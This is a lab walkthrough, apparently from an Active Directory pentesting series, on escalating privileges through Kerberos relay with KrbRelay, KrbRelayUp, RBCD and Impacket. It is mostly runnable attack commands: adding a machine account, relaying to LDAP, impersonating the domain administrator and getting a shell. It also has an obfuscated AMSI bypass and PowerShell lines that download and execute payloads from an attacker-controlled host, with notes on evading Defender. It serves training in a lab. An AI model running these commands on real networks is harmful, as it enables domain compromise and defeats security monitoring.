Another very useful technic to escalate privileges is kerberos relay, like implemented in KrbRelayUp
As KrbRelayUp is detected by defender, we will use the step by step approach like this writeup by @an0n_r0, using @cube0x0 KrbRelay
At the time of writing KrbRelay is not detected by defender.
The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :
Copy crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing Add computer and RBCD
To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module
Copy crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ Add computer :
Copy addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1' Get the SID of that computer:
From windows
Copy $o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136 From Linux
Copy lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
Copy powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1') Check ports
xrdp
Copy xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
Copy PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443 Launch krbrelay
CLISID: CIeAxiInstallerService Class
Copy https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
Copy PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443 Now we finish with RBCD exploitation
From Linux Impacket :
Copy getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local
C:\>whoami
north\administrator with Rubeus from Windows
Copy $x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
And just like the writeup made by @an0n_r0 we launch SCMUACBypass.exe by Tyranid and get a system shell
Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:
Copy .\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on this page , this is leave as an exercice to the reader.
With other methods
